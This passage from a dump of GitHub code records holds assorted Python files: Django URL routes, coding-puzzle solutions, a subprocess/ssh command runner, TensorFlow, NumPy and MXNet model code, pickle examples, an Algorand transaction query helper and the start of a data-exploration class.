)\n","repo_name":"AnYpku/cmssw10x","sub_path":"PhysicsTools/NanoAOD/python/nanoDQM_cff.py","file_name":"nanoDQM_cff.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"29315850882","text":"from django.conf.urls import patterns, url\nfrom niqati import views\nfrom niqati.models import COUPON, SHORT_LINK\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^submit/$', views.redeem, name='submit'),\n url(r'^submit/claim/$', views.claim_code, name='claim_code'),\n url(r'^submit/(?P[\\w\\d]+)/$', views.redeem, name='submit_prefilled'),\n url(r'^report/$', views.student_report, name='student_report'),\n url(r'^report/(?P[\\.\\w\\d\\-]+)/$', views.student_report, name='student_report_with_username'),\n url(r'^collections/(?P\\d+)/download/coupons/$', views.download_collection,\n {\"download_type\": COUPON}, name=\"download_coupons\"),\n url(r'^collections/(?P\\d+)/download/links/$', views.download_collection,\n {\"download_type\": SHORT_LINK}, name=\"download_links\"),\n url(r'^orders/(?P\\d+)/$', views.download_collection, name='view_collec'),\n url(r'^review/$', views.review_order, name='review_order'),\n url(r'^short_url/$', views.get_short_url, name='get_short_url'),\n url(r'^approve/$', views.list_pending_orders, name='list_pending_orders'),\n url(r'^generalreport/$', views.general_report, name='general_report'),\n url(r'^generalreport/(?P\\w+)/$', views.general_report, name='general_report_for_city'),\n url(r'^medicinereport/(?P\\d+)/$', views.medicine_general_report, name='medicine_general_report'),\n url(r'^niqati-user-autocomplete/$', views.NiqatiUserAutocomplete.as_view(), name='niqati-user-autocomplete',),\n url(r'^report/(?P[\\.\\w\\d\\-]+)/(?P\\d+)/$', views.student_report,name='student_report_with_year'),\n)\n","repo_name":"enjaz/enjaz","sub_path":"niqati/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"70067409537","text":"# '(' 의 개수와 ')' 의 개수가 같다면 이를 균형잡힌 괄호 문자열이라고 부릅니다.\r\n# '('와 ')'의 괄호의 짝도 모두 맞을 경우에는 이를 올바른 괄호 문자열\r\n# 1. 입력이 빈 문자열인 경우, 빈 문자열을 반환합니다.\r\n# 2. 문자열 w를 두 \"균형잡힌 괄호 문자열\" u, v로 분리합니다.\r\n# 단, u는 \"균형잡힌 괄호 문자열\"로 더 이상 분리할 수 없어야 하며, v는 빈 문자열이 될 수 있습니다.\r\n# 3. 문자열 u가 \"올바른 괄호 문자열\" 이라면 문자열 v에 대해 1단계부터 다시 수행합니다.\r\n# 3-1. 수행한 결과 문자열을 u에 이어 붙인 후 반환합니다.\r\n# 4. 문자열 u가 \"올바른 괄호 문자열\"이 아니라면 아래 과정을 수행합니다.\r\n# 4-1. 빈 문자열에 첫 번째 문자로 '('를 붙입니다.\r\n# 4-2. 문자열 v에 대해 1단계부터 재귀적으로 수행한 결과 문자열을 이어 붙입니다.\r\n# 4-3. ')'를 다시 붙입니다.\r\n# 4-4. u의 첫 번째와 마지막 문자를 제거하고, 나머지 문자열의 괄호 방향을 뒤집어서 뒤에 붙입니다.\r\n# 4-5. 생성된 문자열을 반환합니다.\r\n\r\nfrom collections import Counter\r\n# 올바른 문자열인지 확인하는 함수\r\n# def right(s):\r\n# stack = []\r\n# for i in s:\r\n# if len(stack) == 0:\r\n# stack.append(i)\r\n# elif stack[-1] == '(' and i == ')':\r\n# stack.pop()\r\n# else:\r\n# stack.append(i)\r\n#\r\n# return True if not stack else False\r\n#\r\n# def solution(p):\r\n# answer = ''\r\n# # u, v 분리\r\n# for i in range(2, len(p), 2):\r\n# x = p[:i].count('(')\r\n# y = p[:i].count(')')\r\n# if x == y:\r\n# u = p[:i]\r\n# v = p[i:]\r\n# break\r\n# # 재귀\r\n# # 완료 조건이 중요 <- 변환시킨 p값이 올바른 괄호 문자열이면 stop\r\n# if right(u):\r\n# v = solution(v)\r\n# else: # right(u)가 False라면\r\n# u = u[1:len(u) - 1]\r\n# u = u[::-1]\r\n# v = '(' + solution(v) + ')' + u\r\n#\r\n# # answer = u + v\r\n# # if len(answer) == len(p):\r\n# # return answer\r\n#\r\n# # return solution(answer)\r\n#\r\n# print(solution('()))((()'))\r\n\r\n# notion\r\n# 주어진 로직을 그대로 구현할 수 있는지 파악\r\n# 재귀함수를 이해하고 작성할 수 있는지 파악\r\n# 재귀함수 -> base case를 작성해야 한다.\r\ndef solution(p):\r\n # 입력이 빈 문자열인 경우, 빈 문자열을 반환\r\n if p == \"\":\r\n return p\r\n\r\n # 문자열을 u, v로 분리\r\n cnt, idx = 0, 0\r\n for i in range(len(p)):\r\n if p[i] == '(':\r\n cnt += 1\r\n else:\r\n cnt -= 1\r\n\r\n if cnt == 0:\r\n idx = i\r\n break\r\n\r\n u, v = p[:idx+1], p[idx+1:]\r\n\r\n # u가 올바른 괄호 문자열이라면 v에 대해 1단계부터 다시 수행\r\n if u[0] == \"(\": # 이미 잘린 데이터인 상태에서 시작하는 부위가 여는 괄호면 올바른거임!\r\n return u + solution(v)\r\n\r\n # 4번 과정\r\n else:\r\n # 4-4 과정\r\n new_u = \"\"\r\n for i in u[1:-1]:\r\n if i == \"(\":\r\n new_u += \")\"\r\n else:\r\n new_u += \"(\"\r\n\r\n return \"(\" + solution(v) + \")\" + new_u\r\n\r\nprint(solution(\"()))((()\"))","repo_name":"Green0v0/TIL","sub_path":"Playdata/핵준특/2020카카오블라인드_괄호변환.py","file_name":"2020카카오블라인드_괄호변환.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33941131034","text":"import os\nimport sys\nimport logging\nimport subprocess\n\n# constants\nDEFAULT_USER = 'qaas'\nDEFAULT_SSH_PORT = '10022'\nDEFAULT_LOCATION = 'localhost'\n\nclass QAASRunCMD:\n def __init__(self, comm_port, machine=DEFAULT_LOCATION, ssh_port=DEFAULT_SSH_PORT, user=DEFAULT_USER):\n self.machine = machine\n self.ssh_port = ssh_port\n self.user = user\n # Use remote port forwarding and then local side listen to the forwarding port, expecting remote side connect back\n self.ssh_cmd = f\"/usr/bin/ssh -p {self.ssh_port} -R {comm_port}:localhost:{comm_port} \" + self.user + \"@\" + self.machine + \" \"\n\n def run_cmd(self, cmdline):\n runcmd = subprocess.Popen(cmdline, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n runcmd.out, runcmd.err = runcmd.communicate()\n if runcmd.returncode != 0:\n logging.error(runcmd.err.decode(\"utf-8\"))\n logging.debug(runcmd.out.decode(\"utf-8\"))\n return runcmd.returncode, runcmd.out.decode(\"utf-8\")\n\n def copy_local_file(self, local_file, local_dir):\n cp_cmd = f\"/usr/bin/cp {local_file} {local_dir}\"\n logging.debug(\"cmdline=%s\", cp_cmd)\n rc, cmdout = self.run_cmd(cp_cmd)\n return rc, cmdout\n\n def copy_remote_file(self, remote_file, local_dir):\n scp_cmd = f\"/usr/bin/scp -P {self.ssh_port} \" + self.user + \"@\" + self.machine + f\":{remote_file} {local_dir}\"\n logging.debug(\"cmdline=%s\", scp_cmd)\n rc, cmdout = self.run_cmd(scp_cmd)\n return rc, cmdout\n\n def run_local_cmd(self, local_cmd):\n \"\"\"Run a local command.\"\"\"\n cmdline = \"/usr/bin/bash -c \" + local_cmd\n logging.debug(\"cmdline=%s\", cmdline)\n rc, cmdout = self.run_cmd(cmdline)\n return rc, cmdout\n\n def run_remote_cmd(self, remote_cmd):\n \"\"\"Run a remote command over ssh.\"\"\"\n cmdline = self.ssh_cmd + \" \" + remote_cmd\n logging.debug(\"cmdline=%s\", cmdline)\n rc, cmdout = self.run_cmd(cmdline)\n return rc, cmdout\n","repo_name":"intel/program-optimization-advice-exploration-scripts","sub_path":"qaas-backplane/src/utils/runcmd.py","file_name":"runcmd.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"19294056654","text":"import tensorflow as tf\nimport shutil\nimport numpy as np\nimport os\n\nBUCKET = ''\nPROJECT = ''\nREGION = ''\n\n\nos.environ['BUCKET'] = BUCKET\nos.environ['PROJECT'] = PROJECT\nos.environ[REGION] = REGION\n\n# Determine CSV, label and key columns\nCSV_COLUMNS = 'weight_pounds, is_male, mother_age, plurality, gestation_weeks'.split(',')\nLABEL_COLUMN = 'weight_pounds'\nKEY_COLUMN = 'key'\n\n# Set default values for each CSV column\nDEFAULTS = [[0,0], ['null'], [0,0], ['null'], [0,0], ['nokey']]\nTRAIN_STEPS = 1000\n\n# Create a input function reading a file using the Dataset API\n# Then provide the results to the Estimator API\ndef read_dateset(filename, mode, batch_size=512):\n\n def _input_fn():\n \n def decode_csv(value_column):\n columns = tf.decode_csv(value_column, record_defaults=DEFAULTS)\n features = dict(zip(CSV_COLUMNS, columns))\n label = features.pop(LABEL_COLUMN)\n return features, label\n \n # create list of files that match pattern\n file_list = tf.gfile.Glob(filename)\n\n # Create dataset from file list\n dataset = (tf.data.TextLineDataset(file_list).map(decode_csv))\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n num_epochs = None\n dataset = dataset.shuffle(buffer_size=10*batch_size)\n else:\n num_epochs = 1\n dataset = dataset.repeat(num_epochs).batch_size(batch_size)\n\n return dataset.make_one_shot_iterator().get_next()\n \n return _input_fn\n\n\n# Define feature columns\ndef get_categorical(name, values):\n return tf.feature_column.indicator_column(\n tf.feature_column.categorical_column_with_vocabulary_list(name, values)\n )\n\ndef get_cols():\n return [\n get_categorical('is_male', ['True', 'False', 'Unknown']),\n tf.feature_column.numeric_column('month_age'),\n get_categorical('plurality', ['Single(1)', 'Twins(2)', 'Triplets(3)', 'Quadruplets(4)', 'Quintuplets(5)']),\n tf.feature_column.numeric_column('gestation_weeks')\n ]\n\n# Features for DNNsLinearRegressor model\ndef get_wide_deep():\n is_male, mother_age, plurality, gestation_weeks = [\n tf.feature_column.categorical_column_with_vocabulary_list('is_male', ['True', 'False', 'Unknown']),\n tf.feature_column.numeric_column('mother_age'),\n tf.feature_column.categorical_column_with_vocabulary_list('plurality', ['Single(1)', 'Twins(2)', 'Triplets(3)', 'Quadruplets(4)', 'Quintuplets(5)']),\n tf.feature_column.numeric_column('gestation_weeks')\n ]\n # Discretize\n age_buckets = tf.feature_column.bucketized_column(mother_age, boundaries=np.arange(15,45,1).tolist())\n gestation_buckets = tf.feature_column.bucketized_column(gestation_weeks, boundaries=np.arange(17,41,1).tolisst())\n # Sparse columns are wides, have a linear relationship with the ouput\n wide = [\n is_male,\n plurality,\n age_buckets,\n gestation_buckets\n ]\n # Feature cross all the wide columns and embed into a lower dimension\n crossed = tf.feature_column.crossed_column(wide, hash_bucket_size=20000)\n embed = tf.feature_column.embedding_column(crossed, 3)\n\n # Continuous columns are deep, have a complex relationship with the output\n deep = [\n mother_age,\n gestation_weeks,\n embed\n ]\n \n return wide, deep\n\ndef serving_input_fn():\n feature_placeholders = {\n 'is_male': tf.placeholder(tf.string, [None]),\n 'mother_age': tf.placeholder(tf.float32, [None]),\n 'plurality': tf.placeholder(tf.string, [None]),\n 'gestation_weeks': tf.placeholder(tf.float32, [None])\n }\n features = {\n key: tf.expand_dims(tensor, -1) for key, tensor in feature_placeholders.items()\n }\n return tf.estimator.export.ServingInputReceiver(features, feature_placeholders)\n\n# train and evaluate for DNNRegressor\ndef train_and_evaluate(output_dir):\n EVAL_INTERVAL = 300\n run_config = tf.estimator.RunConfig(save_checkpoints_secs = EVAL_INTERVAL, keep_checkpoint_max=3)\n estimator = tf.estimator.DNNRegressor(\n model_dir=output_dir,\n feature_columns = get_cols(),\n hidden_units=[64, 32],\n config=run_config\n )\n train_spec = tf.estimator.TrainSpec(\n input_fn=read_dateset('train.csv', mode=tf.estimator.ModeKeys.TRAIN),\n max_steps=TRAIN_STEPS\n )\n exporter = tf.estimator.LatestExporter('exporter', serving_input_fn)\n eval_spec = tf.estimator.EvalSpec(\n input_fn=read_dateset('eval.csv', mode=tf.estimator.ModeKeys.EVAL),\n steps=None,\n start_delay_secs=60,\n throttle_secs=EVAL_INTERVAL,\n exporters=exporter\n )\n tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n\n# train and evaluate for DNNLinearCombinedRegressor\ndef train_and_evaluate(output_dir):\n wide, deep = get_wide_deep()\n EVAL_INTERVAL = 300\n run_config = tf.estimator.RunConfig(save_checkpoints_secs=EVAL_INTERVAL, keep_checkpoint_max=3)\n estimator = tf.estimator.DNNLinearCombinedRegressor(\n model_dir=output_dir,\n linear_feature_columns=wide,\n dnn_feature_columns=deep,\n config=run_config\n )\n train_spec = tf.estimator.TrainSpec(\n input_fn=read_dateset('train.csv', mode=tf.estimator.ModeKeys.TRAIN),\n max_steps=TRAIN_STEPS\n )\n exporter = tf.estimator.LatestExporter('exporter', serving_input_fn)\n eval_spec = tf.estimator.EvalSpec(\n input_fn=read_dateset('eval.csv', mode=tf.estimator.ModeKeys.EVAL),\n steps=None,\n start_delay_secs=60,\n throttle_secs=EVAL_INTERVAL,\n exporter=exporter\n )\n tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n\nshutil.rmtree('babyweight_trained', ignore_errors=True)\ntrain_and_evaluate('babyweight_trained')\n\nfrom google.datalab.ml import TensorBoard\nTensorBoard().start('./babyweight_trained')\n ","repo_name":"kaimo455/Coursera-Course","sub_path":"Advanced-ML-with-TF-on-GCP-Specialization/week_2.py","file_name":"week_2.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42432780461","text":"class Solution:\n def countRangeSum(self, nums: List[int], lower: int, upper: int) -> int:\n from sortedcontainers import SortedList\n prefix, ret = 0, 0\n st = SortedList([0])\n for num in nums:\n prefix += num\n ret += st.bisect_right(prefix - lower) - st.bisect_left(prefix - upper)\n st.add(prefix)\n return ret\n","repo_name":"lih627/python-algorithm-templates","sub_path":"LeetCodeSolutions/LeetCode_0327.py","file_name":"LeetCode_0327.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"79"} +{"seq_id":"3741106119","text":"import numpy as np\r\nimport pickle\r\nfrom PIL import Image\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nclass cnnn():\r\n def __init__(self):\r\n pass\r\n\r\n\r\n def nanargmax(self, arr):\r\n idx = np.nanargmax(arr)\r\n idxs = np.unravel_index(idx, arr.shape) # Get index as multi dimension\r\n return idxs\r\n\r\n def load(self):\r\n with open('params2.pkl', 'rb') as f: # Python 3: open(..., 'rb')\r\n params = pickle.load(f)\r\n\r\n return params\r\n\r\n def relu(self, array):\r\n array[array <= 0] = 0\r\n return array\r\n\r\n def softmax(self, X):\r\n out = np.exp(X)\r\n return out / np.sum(out)\r\n\r\n def convolution(self, image, filt, bias, s=1):\r\n (n_f, n_c_f, f, _) = filt.shape # filter dimensions\r\n n_c, in_dim, _ = image.shape # image dimensions\r\n\r\n out_dim = int((in_dim - f) / s) + 1 # calculate output dimensions some mad formula ting\r\n\r\n # Dimensions of filter must match channels of input image\r\n\r\n out = np.zeros((n_f, out_dim, out_dim)) # If 8 filters, 8 dimensions(1) provided\r\n\r\n # convolve the filter over every part of the image, adding the bias at each step.\r\n # Need to look over and adjust\r\n for curr_f in range(n_f):\r\n curr_y = out_y = 0\r\n while curr_y + f <= in_dim:\r\n curr_x = out_x = 0\r\n while curr_x + f <= in_dim:\r\n # print(curr_f)\r\n out[curr_f, out_y, out_x] = np.sum(filt[curr_f] * image[:, curr_y:curr_y + f, curr_x:curr_x + f]) + \\\r\n bias[curr_f]\r\n curr_x += s # Slide across\r\n out_x += 1 # Move into next location for output\r\n curr_y += s # Slide down\r\n out_y += 1 # Move 1\r\n\r\n return out\r\n\r\n def maxpool(self, image, f=2, s=2):\r\n # Downsample image using size of f and stride of s\r\n\r\n n_c, h_prev, w_prev = image.shape # Get old/current dimensions\r\n\r\n h = ((h_prev - f) / s) + 1 # Calculate new dimensions of img\r\n w = ((w_prev - f) / s) + 1 # Int been moved so beware int((h_prev - f)/s)+1\r\n\r\n # print(image)\r\n # print(image[0, 0:2, 4:6]) #[channel num, x:x+2 , y:y+2], is a 2x2 grid\r\n\r\n output = np.zeros((n_c, int(h), int(w))) # Make empty array to be filled\r\n\r\n for i in range(n_c): # Once for each channel\r\n # slide maxpool window over each part of the image and assign the max value at each step to the output\r\n curr_y = out_y = 0 # Initialised\r\n while curr_y + f <= h_prev:\r\n curr_x = out_x = 0\r\n while curr_x + f <= w_prev: # Only runs till reaches end of line\r\n output[i, out_y, out_x] = np.max(image[i, curr_y:curr_y + f, curr_x:curr_x + f])\r\n curr_x += s # Slide across\r\n out_x += 1 # Next index in final array\r\n curr_y += s # Slide down\r\n out_y += 1 # Move into next index downwards\r\n\r\n return output\r\n\r\n def predict(self, image, f1, f2, w3, w4, b1, b2, b3, b4, conv_s=1, pool_f=2, pool_s=2):\r\n # Run an image through the CNN using the parameters\r\n\r\n conv1 = self.convolution(image, f1, b1)\r\n conv1 = self.relu(conv1) # Relu check\r\n\r\n conv2 = self.convolution(conv1, f2, b2)\r\n conv2 = self.relu(conv2)\r\n\r\n pooled = self.maxpool(conv2)\r\n (nf2, dim2, _) = pooled.shape\r\n fc = pooled.reshape((nf2 * dim2 * dim2, 1)) # Flattened\r\n\r\n # Now do predicting with ANN\r\n\r\n z = w3.dot(fc) + b3 # first dense layer\r\n z = self.relu(z) # [z<=0] = 0 # pass through ReLU non-linearity\r\n\r\n out = w4.dot(z) + b4 # second dense layer\r\n probs = self.softmax(out) # predict class probabilities with the softmax activation function\r\n\r\n return np.argmax(probs), np.max(probs)\r\n\r\n\r\n\r\n def main(self, image):\r\n\r\n im = Image.open(image)\r\n\r\n\r\n im = im.resize((28,28), Image.ANTIALIAS)\r\n\r\n im.save(image, dpi=(600, 600))\r\n\r\n frame = np.asarray(im)\r\n frame = frame.reshape((3,28,28)) #2352\r\n print(frame.shape)\r\n print(frame)\r\n\r\n #naaed to process image\r\n [f1, f2, w3, w4, b1, b2, b3, b4] = self.load()\r\n\r\n x, y = self.predict(frame, f1, f2, w3, w4, b1, b2, b3, b4)\r\n\r\n return x, y\r\n\r\n\r\nif __name__ == '__main__':\r\n X = cnnn()\r\n print(X.main('temp/tempISIC_0024328.jpg'))\r\n\r\n\r\n\r\n","repo_name":"ramstar3000/SkinDetection","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"29332945829","text":"#coding:utf8\n'''\npickle: 数据序列化\ncPickle是pickle速度的1000倍\npickle.dump(obj, file[,protocol]): 序列化数据到一个文件描述符\npickle.load(file): 从文件中的对象恢复为原来的对象,这个过程称为反序列化\n\n限制:\n1. pickle不能保证操作的原子性\n2. pickle存在安全问题\n3. pickle 协议是python特定的,不同语言之间的兼容性以难以保障\n'''\nimport cPickle as pickle\nmy_data = {\"name\" : \"Python\", \"type\":\"language\", \"version\":\"2.7.5\"}\nfp = open(\"picklefile.dat\", \"wb\") # 打开文件\npickle.dump(my_data, fp)\nfp.close()\n\nfp = open(\"picklefile.dat\", \"rb\")\nout = pickle.load(fp)\nfp.close()\nprint(out)\n\n\n'''\n对于不可序列化的对象,如sockets,文件句柄,数据库连接,也可以通过实现pickle\n协议来解决这些局限,主要通过特殊方法__getstate__()和__setstate__()方法\n'''\n\nclass TextReader:\n def __init__(self, filename):\n self.filename = filename\n self.file = open(filename)\n self.position = self.file.tell()\n def readline(self):\n line = self.file.readline()\n self.position = self.file.tell()\n if not line:\n return None\n if line.endswith('\\n'):\n line = line[:-1]\n return \"%i: %s\" % (self.position, line)\n def __getstate__(self): # 记录文件被pickle时候的状态\n state = self.__dict__.copy() # 获取被pickle时的字典信息\n del state['file']\n return state\n def __setstate__(self, state): # 设置反序列化后的状态\n self.__dict__.update(state)\n file = open(self.filename)\n self.file = file\n\n\nreader = TextReader(\"zen.txt\")\nprint(reader.readline())\nprint(reader.readline())\n# 在dumps的时候会默认调用__getstate__\ns = pickle.dumps(reader)\n# 在loads的时候会默认调用__setstate__\nnew_reader = pickle.loads(s)\nprint(new_reader.readline())\n\n","repo_name":"heyulin1989/language","sub_path":"python/books/writing-solid-python-code-91-suggestions/44.py","file_name":"44.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22191974991","text":"\"\"\" Defines media types with their attributes\r\n\"\"\"\r\n\r\nclass Movie():\r\n \"\"\"Class stores the information related to a movie.\r\n\r\n Attributes:\r\n movie_title: The movie's title.\r\n poster_image: URL to the movie's poster or box art.\r\n trailer_youtube: URL to the movie's trailer on YouTube\r\n \"\"\"\r\n\r\n def __init__(self, movie_title, poster_image, trailer_youtube):\r\n \"\"\"Inits SampleClass with title, image url and trailer url\"\"\" \r\n self.title = movie_title #Assign title\r\n self.poster_image_url = poster_image #Assign image url\r\n self.trailer_youtube_url = trailer_youtube #Assign trailer url\r\n","repo_name":"Si047p/movie_trailer","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28141184296","text":"import mxnet as mx\nimport logging\nimport metric\n\nfrom collections import namedtuple\nfrom callback import Speedometer\nfrom config import config\n\nclass Solver(object):\n def __init__(self, prefix,\n symbol, ctx=None,\n begin_epoch=0, num_epoch=None,\n kv_store='local',\n arg_params=None, aux_params=None,\n optimizer='sgd',\n max_data_shape=None, **kwargs):\n self.prefix = prefix\n self.symbol = symbol\n self.ctx = ctx\n if self.ctx is None:\n self.ctx = mx.cpu()\n self.begin_epoch = begin_epoch\n self.num_epoch = num_epoch\n self.kv_store = kv_store\n self.arg_params = arg_params\n self.aux_params = aux_params\n self.optimizer = optimizer\n self.updater = None\n self.max_data_shape = max_data_shape\n self.kwargs = kwargs.copy()\n\n self.arg_names = None\n self.param_names = None\n self.aux_names = None\n\n def get_params(self, grad_req):\n arg_names = self.symbol.list_arguments()\n self.arg_names = arg_names\n arg_shapes, out_shapes, aux_shapes = self.symbol.infer_shape(data=(1, 3, 224, 224), rois=(1, 5))\n if grad_req != 'null':\n param_names = []\n for name, shape in zip(arg_names, arg_shapes):\n if not (name.endswith('data') or name.endswith('rois') or\n name.endswith('inside_weight') or name.endswith('outside_weight') or\n name.endswith('label') or name.endswith('target') or\n name.startswith('conv1') or name.startswith('conv2')):\n param_names.append(name)\n self.param_names = list(param_names)\n aux_names = self.symbol.list_auxiliary_states()\n self.aux_names = aux_names\n self.aux_params = {k: mx.nd.zeros(s, self.ctx) for k, s in zip(aux_names, aux_shapes)}\n\n def fit(self, train_data,\n grad_req='write',\n frequent=20,\n logger=None):\n (kvstore, update_on_kvstore) = mx.model._create_kvstore(\n self.kv_store, len(self.ctx), self.arg_params)\n if logger is None:\n logger = logging\n logger.info('Start training with %s', str(self.ctx))\n\n batch_end_callback = Speedometer(train_data.batch_size, frequent=frequent)\n epoch_end_callback = mx.callback.do_checkpoint(self.prefix)\n\n self.get_params(grad_req)\n\n eval_metric = metric.Accuracy()\n cls_metric = metric.LogLossMetric()\n bbox_metric = metric.SmoothL1LossMetric()\n eval_metrics = mx.metric.CompositeEvalMetric()\n for child_metric in [eval_metric, cls_metric, bbox_metric]:\n eval_metrics.add(child_metric)\n max_data_shape = self.max_data_shape\n\n self.optimizer = mx.optimizer.create(self.optimizer, rescale_grad=(1.0 / config.TRAIN.BATCH_SIZE), **self.kwargs)\n mx.model._train_multi_device(self.symbol, self.ctx, self.arg_names, self.param_names,\n self.aux_names, self.arg_params, self.aux_params,\n begin_epoch=self.begin_epoch, end_epoch=self.num_epoch,\n epoch_size=None, optimizer=self.optimizer,\n train_data=train_data, eval_data=None,\n eval_metric=eval_metrics,\n epoch_end_callback=epoch_end_callback,\n batch_end_callback=batch_end_callback,\n kvstore=kvstore, update_on_kvstore=update_on_kvstore,\n logger=logger, work_load_list=None, monitor=None,\n mutable_data_shape=True, max_data_shape=self.max_data_shape)\n","repo_name":"zdltheone/mxnet_windows","sub_path":"mxnet/example/rcnn/rcnn/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"1001820100","text":"from html.parser import HTMLParser\nclass MyHTMLParser(HTMLParser):\n def handle_comment(self, data):\n if \"\\n\" in data:\n print(\">>> Multi-line Comment\")\n else:\n print(\">>> Single-line Comment\")\n print(data)\n def handle_data(self, data):\n if data != \"\\n\":\n print(\">>> Data\")\n print(data) \ndef parse(string):\n parser = MyHTMLParser()\n parser.feed(string)\n parser.close()\n\nn = int(input()) \nparse('\\n'.join([input() for _ in range(n)])) \n","repo_name":"Harjacober/HackerrankSolvedProblems","sub_path":"Python/HTML Parser - Part 2.py","file_name":"HTML Parser - Part 2.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"71470928895","text":"import logging\nfrom typing import Optional\nimport datetime\nimport aiohttp\nfrom dataclasses import dataclass\nimport requests\nimport aiohttp.client_exceptions\n\n\n@dataclass\nclass QueryParams:\n after_time: Optional[datetime.datetime] = None\n before_time: Optional[datetime.datetime] = None\n min_block: Optional[int] = None\n max_block: Optional[int] = None\n\n def make_params(self):\n params = {}\n if self.before_time is not None:\n params['before-time'] = self.before_time.strftime('%Y-%m-%dT%H:%M:%SZ')\n if self.after_time is not None:\n params['after-time'] = self.after_time.strftime('%Y-%m-%dT%H:%M:%SZ')\n if self.min_block is not None:\n params['min-round'] = self.min_block\n if self.min_block is not None:\n params['max-round'] = self.max_block\n return params\n\n\ndef get_current_round():\n url = f'https://algoindexer.algoexplorerapi.io/v2/transactions'\n req = requests.get(url=url).json()\n return int(req['current-round'])\n\n\nclass QueryError(Exception):\n def __init__(self, msg):\n super().__init__(msg)\n\n\nasync def query_transactions(session: aiohttp.ClientSession,\n params: dict,\n num_queries: Optional[int],\n query_params: QueryParams):\n logger = logging.getLogger(__name__)\n\n query = f'https://algoindexer.algoexplorerapi.io/v2/transactions'\n\n params = {**params, **query_params.make_params()}\n\n async with session.get(query, params=params) as resp:\n ok = resp.ok\n if not ok:\n msg = f'Session response not OK:, query = {query}, params = {params}'\n raise QueryError(msg)\n\n try:\n resp = await resp.json()\n except aiohttp.client_exceptions.ContentTypeError as e:\n logger.critical(\"resp.json failed\"\n f\"\\n{resp} = resp\")\n raise e\n\n i = 0\n while resp and (num_queries is None or i < num_queries):\n for tx in resp['transactions']:\n yield tx\n\n if 'next-token' in resp:\n async with session.get(query, params={**params, **{'next': resp['next-token']}}) as resp:\n resp = await resp.json()\n else:\n resp = None\n i += 1\n","repo_name":"lrnz-vtl/Algotrading","sub_path":"algo/blockchain/algo_requests.py","file_name":"algo_requests.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5645892425","text":"# -*- coding:utf-8 -*-\n# from Preprocessing import PreProcessing\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport time\n\n\nclass EDA:\n\n '''箱形图,通常用来确认数据的分布情况,如最大值最小值,可用来确定异常值'''\n def boxplot(self, data):\n # data = pd.DataFrame({\n # \"dataSet1\": [1, 2, 9, 6],\n # \"dataSet2\": [7, 9, 90, 3],\n # \"dataSet3\": [78, 90, 190, 6],\n # \"dataSet4\": [78, 9, 0, 87],\n # })\n # draw\n '''最大值,最小值,均值,上四分位,下四分位'''\n data.boxplot()\n plt.ylabel(\"value\")\n plt.xlabel(\"label\")\n plt.show()\n\n '''柱状图'''\n def bar(self, x, y):\n plt.bar(x, y, width=0.35, facecolor='lightskyblue', edgecolor='white')\n plt.show()\n\n '''确定每一列数据的分布情况'''\n def hist(self, data):\n # data = pd.DataFrame({\n # \"dataSet1\": [1, 2, 9, 6],\n # \"dataSet2\": [7, 9, 90, 3],\n # \"dataSet3\": [78, 90, 190, 6],\n # \"dataSet4\": [78, 9, 0, 87],\n # })\n # draw\n \"\"\"每一列数据的分布图\"\"\"\n \"\"\"normed表示是否将频数转换为频率\"\"\"\n data.hist(density=False)\n print(data)\n # plt.tick_params(top='off', right='off')\n # plt.legend()\n plt.ylabel(\"value\")\n plt.xlabel(\"label\")\n plt.show()\n\n ''' 读取CSV文件'''\n def get_csv_data(self, dataFilePath):\n data = pd.read_csv(dataFilePath, low_memory=False)\n print(data.shape)\n return data\n\n '''将每一列所拥有的类别个数写入文件'''\n def write_column_count(self, data, column_count_file):\n with open(column_count_file, 'a') as a:\n for column in data.columns.values:\n count = data[column].nunique(dropna=False)\n a.write(column + \":\" + str(count) + '\\n')\n\n '''获取键值对'''\n def get_column_value(self, filePath):\n columns = []\n values = []\n with open(filePath, 'r') as r:\n lines = r.readlines()\n for line in lines:\n line = line.strip().split(\":\")\n temp_column = line[0]\n temp_value = int(line[1])\n # print(tempColumn + str(tempCount))\n columns.append(temp_column)\n values.append(temp_value)\n return columns, values\n\n '''将每一列空值个数写入文件'''\n def write_null_column(self, data, column_null_file):\n with open(column_null_file, 'a') as a:\n for column in data.columns.values:\n null_count = data[column].isnull().sum()\n # print(column + \":\" + str()))\n a.write(column + \":\" + str(null_count) + '\\n')\n\n '''将某一列的某一个值和所对应的个数画出图形'''\n def 